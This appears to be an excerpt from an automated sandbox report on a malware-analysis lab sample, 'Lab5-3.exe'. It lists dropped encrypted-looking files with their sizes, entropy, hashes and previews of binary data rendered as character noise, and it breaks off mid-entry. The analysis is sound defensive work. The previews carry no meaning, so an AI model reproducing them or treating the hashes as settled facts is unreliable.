                                                                                                          SHA-512:E513D4366C7DE7EE22705FFD6B0EA6BFA5A34951A98C2A93C69A4EE49857D1A2CF55506E32689A3AAEDC05565BE8EC2302FA077C90EE77776F5F455D6F1789A4
                                                                                                          Malicious:false
                                                                                                          Preview:.....I...Q..|.L..WvP...5D.&........_w...8#...T.0..#..m.{.......K.5K_...L&..S.[7$...Y..h..G.3Ap...Q.-$...<#,...K...W..(f*..H...Q...]..I.=.s...i...?.P...k....5=..:..p.|......#..C?...K.ba.9.....4..K..(O.b.V.lD<....1e......d....e}W..V...~Y9......J.... m...0.6.%X.w.!.4.v.{0..+........ntB....n^R...E.p...g:9..2K...6...t.XHi.z.-..*..>..&?..a\.^...PM.X..,-.p<...F...w.?8.}?.L.o..0s....H.-.pt.c...W.f.j..x.E.+.....S.h...,.U.5...../.6x.9Nx....n.HIa.....H.=O...p......!...=.A.....F\.U.S..L....>...\.../..NH.i......}..lz../.3.i..'.......~......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.891141746305663
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lrkhl6+SMe0Mzre1HfUTid3hBaUoSGFcmeykEdEElU92i:+4MelhGx0uKeY2ElUJ
                                                                                                          MD5:20A011C056668A6F55A5C2AB7856CB30
                                                                                                          SHA1:FA73310550D1EDCB6B0254A243D851EFAD4F90D4
                                                                                                          SHA-256:737574316DCC329B1E91222873AF67FA77ABA9E86EFE29989029C7F0A2384CE2
                                                                                                          SHA-512:6611B60E71F669B1AFE513C250F17C3C5BD40BB714ABC5A95CF563FED317F92DF7B745CFB5BCA159ED52F6FE9D2732254C9CC9DE818160306C50B453061610A3
                                                                                                          Malicious:false
                                                                                                          Preview:.,!.r...d.eZ.x...Q-.....F...b.....0f...6G.jo.r.....-..o..g.....,.....J3n..../...kG{.Bf..'.l.."kt.O.MB....*...P.u.,.=..q...=.E*......c....2u.f.iC@...6......T.......w.....Br.Lq.9..#..x.#`.=......N....;....9......Q7..r...\.W)-.99.E.;/5.@(J.P.%.p......X.'.]....u...C.CG.5.V.j.F...6....."M........3.F ...r..E4rC....=I....D0.`...c...w.p.P....(./;.R..cP...*^..Xmn.`.4@M.~....t..,YGY.kR..E.&L6.c....e.N....|.....q..Z..P..E.R...~.'.#2....j..*...[..?.4.#.\`...>.../..:Nj+.1:.(..^.*......[."j.;A.F8......15.+..e...`1.m....v-*Z.y.T..!..}../..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.890945134506196
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+7+tiXQn+k4E4kzTUHfUTid3hBaUoSGFcmeykEdEElU92i:+7+t+Qn+kz4kzGx0uKeY2ElUJ
                                                                                                          MD5:CF5E6DFB373C0A72F0A9A65237B01980
                                                                                                          SHA1:DED62D3C37D3B41777A83646F321FF7A4B11DEC9
                                                                                                          SHA-256:784C9F2779200443B62EA931A786023F4D7E14FA9B743D9D42F5FABD5771F4DB
                                                                                                          SHA-512:DCD208426ACED536592FE2F8317CCA53AA77FE708DFB2CDCAEB1C707A3B19C953328EBEA6F15CC262966826970A5F612E66E7B6B39EFF1982D73799CFC62E494
                                                                                                          Malicious:false
                                                                                                          Preview:.....J..@.[C.......G........f.M_..I.&..Qq...bN.GV=.....V...X-.d.:.g_..I...7..{.W....=q.U3.1..]./.E1.#..a...>..p4.0*.o.~.`..z_....k)a..{<o...=...0e...~.0...H..v...4......~..B.. 1........_....fe..kbVh.].XJsB<b..O*D..VP...S.i....a.J...qF.+.pXD..<..^%h.!y.......+..7......`e.B.v.(.].~..V.'=NpM.7'l.2..g..z...J...8Utn_.d........T?..(...f.4.7........<.e....H..:s....#7._:.....a..3....~...g.s[....Daa...(.....P..F...T....J^.F...&ii.g........b..W.49".Q.F.#Z..JK.l...5|M.\...PLU.U.....d...(.|.=.....y.6=.-..9....a..G.,..3.1#.|`,1.....H.9[p....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1840
                                                                                                          Entropy (8bit):7.888790175934132
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:RRy4ksvqPWHfUTid3hBaUoSGFcmeykEdEElU92i:qTtGx0uKeY2ElUJ
                                                                                                          MD5:78290BBABC690271B0C05AB462E7BD58
                                                                                                          SHA1:58FD799ED0A41BE5D1EDD4AE70FDCB39C117C88A
                                                                                                          SHA-256:0B4D1EF35E5C932679DD3804E9B40138E41E47F9F3357F74BC799846A2FCBED2
                                                                                                          SHA-512:FFC54E6C1D58CA92F79833DE700B00AEAF674C98C9BD79535E227133FDC1D681BA2A7DBA43C98255399D3B204AB50E720E3E496058BEA420E4CD54B983507224
                                                                                                          Malicious:false
                                                                                                          Preview:H..V.....q......."%......6f_ie.....8.O..V.x.(.`.........P.....Oz....4jt.[X.HC.Oy.\.}r..d$.SL@ <X...H.....D.dL.jV...-....w..&....i.QrB.meN..d..q..1.4.O.\AT.w0......../..\.d...@.....E.@[.u....~.....<.xj..|.%...L...i...8..@.~.e.I..(~4.H<....N.5..y@......[f...[m.......r6,........9T>e[zj..:._...~"NGLQ..p.W...9./...Z.Y..*.\..;;Y...."...^w..&y4tf$.tqG7..t....d..=.#.F....q..zk..x.>.......A...y......FeX.N.,...9..R~a.2...9....kH.....[.y.....O.....'.h....}.X.9..fb.z.J.|.....qm.. !.V<0.$.I.. r...=...SOf.....^g.{.......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.937331521781981
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IDswX3mo3+wGzC7nCyPCoEa87WM5yAI33sebnNXnaHfUTid3hBaUoSGFcmeykEdM:I7m6YN5oH8DQA0su1Gx0uKeY2ElUJ
                                                                                                          MD5:17139B2AF1A651B3A80F902980400ADE
                                                                                                          SHA1:6A0286346681E5A588F4E81E213D3691C4BFDC82
                                                                                                          SHA-256:49488A87CF91DA6D65CEC2E2A0586FEC195884B792149529269463FFA9240E2D
                                                                                                          SHA-512:D51FB495880E13165B9F2C106D3003E0700BF7E1266515BECE7D17E7748EC2605908D7A72053B87714A1EC8E7AC9C6CCCD80971ACDF74B225A7FB921983663AC
                                                                                                          Malicious:false
                                                                                                          Preview:..>.,`*]H.`...e..V8..d:-_f#.......^....0..w..F.WA....q.G..Y....&...~...b...@..e9;.. i....+h...`.U.......Z.u.p'.j^~Ke...gQ.........P.Q...#.@...M...:C.....i...u.<.........P.O.<;...,...eI...Se....x.\...R86..h...{.sCV...H..;.^l..1.Z...<..b)j..*....:OJ.o..kN3..@..A....6g(.6....h..G.r...}..U..0...._..{.v........w../...a..P..!........`...Nm.....,.......^....J......B..;.Z<....C....p...xh~..f=q..s[.7.....\".j.$.ax;K.............~M.#S...Fv'........m.....>...6S.I..z..#..Ik.3l.F.........m0tt...&.a.rp.Im..I@(......l....(..o..n..eg.I.....HV.7.......m*..B..CO..3..}............6.!.}..8x{...7Q:...|M7......I+-..,......P..n........U..?*.M"...b.5Nne....g.'..$N......|...U..mG....)Xem.ZU%..z...YU.::m.......Msy..r.H...........9.I.9S.g}.Y2.;1\...8..d..?.8.F..du.c^.b.F.W..+9....\wG.....~.a...."C...N.b..... ...QvE'.)K.Y.oNXUM...c..ON..+...e.....$5...D.z....`8m4....'....x."9}M.WD,/...s^...E+.N....u....0...J...<8.I..1k;.......I..A...2..W..`...vr.L..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.952655489555673
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:QlkzbAEhDCKtf46ft5hOkmvOFj6OffsElmtSU4+bvHfUTid3hBaUoSGFcmeykEdM:QkfAEhDCKy6wjurfhBL+b0Gx0uKeY2E+
                                                                                                          MD5:FBC71927442656CE6E341BAA9A99F204
                                                                                                          SHA1:589BD3793DE58F2D8E93BC315BF1C84AB5B80F76
                                                                                                          SHA-256:659F0EB9B9F3C8232D3D86CB72C7BC3D210B3112C85450FE6CF85CC6636D51C0
                                                                                                          SHA-512:F12F8D145B0EC29FE77FCB82DEE726BCBB2C4D58868B8AF61B5A59A96EA1609AC87465C2DBCDF8AE4C86AE0FCC6D6B20698C68EE9DFB76354602129BA5D1729A
                                                                                                          Malicious:false
                                                                                                          Preview:3.....5.C...Vj._u.M_i..p..PZn.$54.:.).....$.1Zb4D|.o$.x?..P.!..!.m.h..[....:S.Z..........l\..@.1.(3.v..*.<#.#.W./.}..g[....X.....GB..B8........4.H....q....h.@.{b......B..rB.....4....w.e.........)"Sv..._|...b......M.{r[..c.].^.,m..t.x.....90.}.r....CZ.w.;...a|...1.U...*.R.3_^=M..`.r.. 5...^.4.dE....0....hB..!m.../...U.Pi..v....'...........:..`7\...~nU....WK%.yk.).....M...L1......\C=.Y..c.\.S......I.....M`{Q....R.....`1&.W]...8ga...O......6.....f......p.J...............q.w$T.............HII?....O..&......K.:Rt.il. .4%.D=^.8A..5M.lCa..6........1..y.f...V.h....g.O....&v..P.../..|'.-.5...pyq2@.B.......9(...iI.'.....v....1T..}.lF,.5...........?V....TXu.v. ...LWEA0|...w...V.F!l.KW.....@...B..<..&..(..V..ln..6..z[......X.0...Y@.Of>.K.2..4.,KJ.GB5t&.\........../}.....j-..eu........!:...y`...!.......{|..n....%_...B..Q]?.fs.R..@...(*k.....d..n].s.....l.C..[.._..o.........Nf.T....%.Sc/....#...p.L.H..9{@W.....&.[.b.?.mX..&~p.-......g...U......^n..j...[gc
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.900884440086701
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:53u79uxWHHfUTid3hBaUoSGFcmeykEdEElU92i:5e79SGx0uKeY2ElUJ
                                                                                                          MD5:18469B2F94F146ED7C86473C397148CC
                                                                                                          SHA1:FCF3666F9681AEDC1CD9748075426C13A6A398B1
                                                                                                          SHA-256:4C4E89DB39C8E7DA07EFE0CDC83DC19BEB9E7B4F24C96F3437B194DEA12447DF
                                                                                                          SHA-512:D03D6E80142545BC393C71EC4EC1A40838A0A91C563713076FE2241DB2645BF8AC26374CBFB25BC0AABEEE2FE0CB697244EB32E4BE9B499E815B128ECE25FEEF
                                                                                                          Malicious:false
                                                                                                          Preview:...+.........vD....`....C..P.\.a..94S..N......O.?.].`(y..!.A..n..*.P7....h...6...&n.F...}b;:.7.o....E...r(.....g..... .1g6..x_...)....9..`>DS{L......T........].%a...5..'...._lf)....?./.....$..08....&"..3.....hi"e..d..h'....@....}.3..^.....A................"....L.....Lz-.f#.T./.K0&..C......}&Y....j.r.G.a<B:.6..U..nh_a...cT#,..!.Z.`.C.~.]m.Y.0[.n.?..'..^...r.m..>'.4.W...M.W...}!.O$..1.......W.. BjY..7.Sl.U].S.m...+.7}..`.......RNz$..4TM....^.Y..\....x.j...?.]Vn.!.]..-.....G...DI.Y..@ow(.pMp..a..7...x.M....8k.5....C..S..J0.._U.;.h.J9..\...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.933995182346965
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:B0ARPI7XmdK3Fd/k/nE3IH703s8j1j4HfUTid3hBaUoSGFcmeykEdEElU92i:BNRw7Wdav/k/Es7QZfGx0uKeY2ElUJ
                                                                                                          MD5:271FDDD6F036224AA16D98675BC0B1EE
                                                                                                          SHA1:081D1BC884E5965FD9F861639600DE72CAD6AFA1
                                                                                                          SHA-256:978D9E9C86DE4C05D3FF70231A45F2B563DFB5EDA3DFC4A46D0B7DFC565C7674
                                                                                                          SHA-512:D56387E1E49B8F87A92937007517C183DE66A3ED08F924EEA0C4F7A14F737942B65FFC78926CFFD87162C2B05C339348410B687736DA8ECF29888977316D1779
                                                                                                          Malicious:false
                                                                                                          Preview:.........`......s..#....[.FO.A.....0....KE......t..7HB.PN......x$.Q.;...X.!5..b....>...m!L#^Y..4....>.(.S.f.=.Pk_...6.8..X........L...@f;$f..A.k.X.Z..E.G...s....).+.a....y.6...o..4Mh.....W.[i....}..Z.+&<L$.b.P..5.....N.Q.h...qj......0)....h.l....]z.X..._V..7...Y!...*Zh.tPB...;..S....Wv..[..F...D&`f...L.1.'r..}Ql.#.&......./;N.a:.........:...VW..Db../.O.m0..eP]..](k.V>..0...(.{.}.<...h.I....E.....J....].......#.. ............V.+q.:nLU+`...h........|W..o....p....n.=......=.=..Y.eU.9&..E...'..Ulqp.{...+.W....~.HH.|.b5e..l...7{.nYU.m....".u.C.t`dI.?E....n.4..v....@..r.tv..Cz..0.~.f.VP.T........_...L.U6e.%m...{.;.?.e..7Y.y..4.>....9...........&.!..r}..Q....+.V..1.^...b..t.......=b}A..$Y...L.,.r..~.C....7{....?x..W.j...=.]..<.e.oM.YI.....""..D<...p...c.s....O.%...+..........3.9..Q.Y.../......JB....e*N..7.d.}...D3/c".W%..4.......W....h.n...B.H....I....tP...4.."....<.g.v..}C).)2....P......z.TeOv.7.2..SL).X#..L..Y.8.l......rO.'.3S..J.Y.'...+
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.910388976905043
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:z3bMnitIgFn6HfUTid3hBaUoSGFcmeykEdEElU92i:zwn5YVGx0uKeY2ElUJ
                                                                                                          MD5:B8953D2FBEA4FEDB3DC3D1706CEDF401
                                                                                                          SHA1:AAB4FDDF44EA6E2219EA229D2963A8E4A360D606
                                                                                                          SHA-256:C02196967EBC1ADA2D285477514223B816692C825B89A428CB8FE7D89A466F2B
                                                                                                          SHA-512:874CAEAD9A40EF353D5B18FF655B51009AE03284C263B33971F9DA9AD7B069F401C22B9D292FD45A92082C9CE7261A5352E447CB2CBEAB6BB87340CE1BE4C781
                                                                                                          Malicious:false
                                                                                                          Preview:. .x.K...Y..X.....8.{'....`.1G..O......!~.+s".n......H|.C.+.....'....k\.z..-..j(o.C....6......O{..M..B..%.?..#.Zim>..5....8\.....)z:..f)s?.Rmh......6...l...fte1h5..H)...L..}.....S...iw.DCzP..d..........e......C.....D.3...!.p..p...n).g..p..'!F..m...w4....p..."R..T..w.Mz.9...Z.w.".%.......:....?4,..k`.iH....x}9.-.@].5..V...m.J....R.a...)...F.=q...`.....~.!.../+y.:"....r.v..J?....H.....*@.....Y.(.st.1?.~..6.u.p...G...NQ:".w..+.0....f4....*0.....l.Q...v.1g...g..BD.iq...h.L[iD.U...z.T.."soRm.o<.&=...?.rgz..fI.v.h....$9<.d...t..=."....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.905062765408593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zu6MVVXnxeoRpHfUTid3hBaUoSGFcmeykEdEElU92i:zKVlRqGx0uKeY2ElUJ
                                                                                                          MD5:75C093A4936137C2A271DD487683D64B
                                                                                                          SHA1:2DD985BBBC64B09944C6133E2CB6C353DD54D52C
                                                                                                          SHA-256:6BB489ACCA97FECFA2F2FA91B6CE0C8C98C551849032EBFD73EE3ED884821D72
                                                                                                          SHA-512:4E94A2A9C410F91FA8B99F7C51D94423347F4338CC7B16DFE7E7AE4F027501E492507C77B807594235F9F7AB48DC1648F75CDD280B7906F64A54C00C9DC8C90D
                                                                                                          Malicious:false
                                                                                                          Preview:..Z.0CV.h.1./...y.t..R........k.....Y$...S.G....V..!;...&fsz........U.u.....H.!G.:(...".....lt.i..x........%Q3..."...V.3M|.......f,+.R./<.+..&.h.7.RH....._......^......@.S...y{.z..v.I.n.?........r\..x.uP...}...08.^C.M...>..s..K...h.w...q.B2.......M."...8..K....[..y#m..V]Xx..*...?...".r...Z.q..6\Y..8va.j..L..]...O..B{....+-)Y....6..@Odu..6...}4D#`.t.....2......6._.X]!..=.R..L..z....rG.../q...=.D....E..F,.(.J...Y...f.ss8.XD.My*..{.v@O..(..+..6...r........N?..Y`!..].T.........p@...=.?"@...}...0.O...k._.R...c|.=g+*X".a...m.9'I.r,T...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2960
                                                                                                          Entropy (8bit):7.941333493452919
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:F0WpOj6fcjnXh4tQBdnArkiiajQ/iIvYa/Nk7xqibDHfUTid3hBaUoSGFcmeykEO:FhptiXhhdckek/iRBj8Gx0uKeY2ElUJ
                                                                                                          MD5:63DD14EAF55250101C70436549A0974B
                                                                                                          SHA1:9D48789CC4ABE9ADE8003A5263A682ACB5133111
                                                                                                          SHA-256:610DE4ECD37826825BF3DFEB241F6EE58E40205346AC754E5D41ABCE8790F786
                                                                                                          SHA-512:41B103410CE8D76498AA3CD42AA0480149121ACB3AD90A3AD7F3F45A9EC1745BA368B560A019BAD11532FFA38788771ABACDBBB8035EDB897897DD2E6E31F5F6
                                                                                                          Malicious:false
                                                                                                          Preview:{x.%..p.{8=M..p..E.......h..c........~....=c......._......_.."..#...u..>)+L..'z.Y..c`TA.Nt..i._.......J f5B-..jVE.e..'i.4..`y....VR .D.~I?...R.\s..o...S......A....y..u.e#h&..J......f..#.QRBYKT7.W.~.]].....G).....ts.....o...`F........14.c...}....fU..Q..v.6c3.T.N/:^%..>}..a.M@.4..5.g;.&.F0'h..l.wQT..I..60.. A.[H..).v...../CE1zY.s.....>.A*.:....I..- +..."h.v.9......:......9.y...t.{#._.d.{Ub5.Iv......m...by.^M.>.....A......h....B[7..Z{.....|_..G.S9c.c=D4....RBke.e.>*...,..U.q..%....a.....zP+.g.V...j...HDe......s.V1..r..Ho.Ww...Y..V...l...4cu|.g,....h ..:...w9...'....2m.`.l...&O.l=..Z......~..z.g.F.p..k...A'...B.6..1...|.l....sm.sh..9..^.....!...r.h2..GH.)...[T.(\...*P..K.......<.\bg ...;&..o...Y.d..#..............9.8...B...eE..r.B..B..{.....0#.*.....N........q./...b[...6`h.._..L6...uc.t.|..J......E....#...~.-.GGXu.......K..&.MU.....H.$f...._..".a...z"".W.....MCc._kS.A..=.}...>.....2H.@.e.C...#%...j.....[/y,D\|..s......W....k..h.f{..D..Q.W..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.902969802452722
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4hnyon2qaHbVrHfUTid3hBaUoSGFcmeykEdEElU92i:4R2b2Gx0uKeY2ElUJ
                                                                                                          MD5:2ADA69A769E9D6D11BEBD091E8E8A334
                                                                                                          SHA1:D6CDE10B931058819DC6BFC36D7C84C4B896DCE1
                                                                                                          SHA-256:C487643AA4CDA10701820EF8FF8F39B8584B5A9FE15D7962C1AAE3656A9B52FE
                                                                                                          SHA-512:8CC5EFC1A65FD1F6940BD3115857387BA683A5A00E2F62129D82B5FE9FB43FA88DE0B060209924155A44935609FC4576F893A195CA77D928C82B5DF1B40AC70A
                                                                                                          Malicious:false
                                                                                                          Preview:$._...qx.v.}.M.:.8c;?J..(........J.z\<..q..._E.a=..b..o^/.4}..2...*E.Yd.6./+..o.@.1.K}OD.._.O.S...f.|a.7..>......ju{....&......Nz.@...e..>'..t.n....*.azdo...@..X.N...{y..cO.D..B7.O.H..;.<.x...k#.....a.......e.X|.......H..Om.<..(."..K{.k.}#..F..O..tA.=$.lL`n!F.GIu....f..N..7$..>.^.y*...!l.....$.g.f,%6.q.n.E...U.-..W..........=!9.b..\~q...{.!"uZ..8..O.....c|sY..}....\.o.30+..!\.5..2^.G..X..9!..8?..,.w3>.4.)d.&..k...3f.xC...Y..q.z2.r.jJ..../]@..../.....?......;.Y...a.\.@..2.i..[.i...t.Z.....W.m+..../.[....(..8.................c.h.L?...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1840
                                                                                                          Entropy (8bit):7.904485131969288
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:eMv/ZPV4G7UOZHfUTid3hBaUoSGFcmeykEdEElU92i:e6/Zd4G7CGx0uKeY2ElUJ
                                                                                                          MD5:B41EFDC880DB0E7D9746F9671314658F
                                                                                                          SHA1:5DCBC58C94E0458998D63DA883879E0DBCA0F6F1
                                                                                                          SHA-256:8AFABDE65D9224A3C70A88B671E16F3E3637FB7E31FC7AE6A07D918F813F086E
                                                                                                          SHA-512:372B0A76A3E95DD43B4F4DF59AC9FD2485D80E49B30A3A4C2189B82CDF7AD752443D38F8072B06B41087EF05906ABF5FD46FD6A9921B4FCF4A549011624051BD
                                                                                                          Malicious:false
                                                                                                          Preview:...(.tf.fO>.9.0k.U"..w6q..\...}.w@..^j....A-K[..=..'.. ..2._.,.mu.Dg..H.{...p;v.j]...h.H...8..:.d....fe...C.DA....X..5>...y.sO.4......-....I..}.oh..~..w....J>Ul.......1k......s.8.......L/d5...YA...x...C.H.SG.`.5.A.;a.}......\...ap.1.a..%..@o.LQ....m...........+,.4.........+......m......>.......4.o.B9...E..J..l...p5..fY.......=...,8j.3Y>..8/o.....h...N.%....M..k'..d.~..;CU........KLQ...F>.m*N.jN.G4..k..H.v..!.&d...Jc.RQ..T..T.T."..#..,.{'!.H!..8.....e...z>X.;#\..lp.=..7Q.'B.yD.b].#G.....-.T.....;Q...ksO..N..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.941747640463168
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tEthe4PXNljgOyT2TpY+RBnizDPgFaHfUTid3hBaUoSGFcmeykEdEElU92i:Oe4PPLXlizTg7Gx0uKeY2ElUJ
                                                                                                          MD5:1461FC1B80B97D3A3FD520625FE5A52D
                                                                                                          SHA1:866B46B7E3A3533D016832C4691DBA3E1946C48F
                                                                                                          SHA-256:E7CC9AE667F6D474BF9EEA3A5C444DD2F859066C48F10AEAACFEF15FE021D7FB
                                                                                                          SHA-512:A0C6090AF075EA3ABD7C1175266FB94ED46AADCC2D8E5AEE378CF72D24D30099F2A1C6057611B4171B92255A54A374B50A7841EE8C3D308E08AAD1087D5A409A
                                                                                                          Malicious:false
                                                                                                          Preview:2k.]......_i!zD....2..n.S.u+...._d................b....f.O.....k...5..C.<...`....m...&X..KR.>......i..d...z..*D....'..y.....E.T..:@!.7...j..Rb*..3s.DVz...&.B.....6....@./g.8.3I/{...gTP.&..r...O0U.ZT..9.T.t}.iI..8.w$... ]'.Js....}...Fd....P].h.....t..( .w..)..w...'*.XR..xr.b.W......:.sVf.[2.&]o......|n.J...G...S. .......;....v...(..q#.....&..].g?.....x.Gp......h...kt....w...89+...e.E.l$Zx....u..M...d..jw..H..:............o...[IFq.+..2.6.[.u..*s.m/...X.I.n%.7....w'.Dy.7.L..X...q...N.........w.F.6N..)9./5.V.....kc....J@..:(.....p-.(+.....R.U}..8#.v(..z..K.xV......#y6.W....U...o.Qk-......7....9..-........{ .=N...r..I...r.l..T]...'.?....^"..6.cwU.S.........).G..!.A.l.*...].n....^x\..z...#...Hv..e...#.W..T)i......?/|.................y.kE......~.J......h#........?....K.8..ol......j..8..1.o.k~(....}5...O...f.t...`k.}V(.....`...v.d..:.^.!.'..)c....U...^&....W..6..$:..$.0.;A$....{LH.k.f.@6x.n.O.I.p.d.5S1.."N.\'a.0I...."k,...P|..f.....(
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6784
                                                                                                          Entropy (8bit):7.972505270272714
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:vJ8jpes5bqPO4GxVgW5jGPv62sNQLrAwPeV0Cb:WjpesMO7VgLa2sE/atb
                                                                                                          MD5:A8ECEE0670E125C5CE2E7A06925D3B63
                                                                                                          SHA1:3FA2C1062D373DDF3C3907066074120B5D2EC7CA
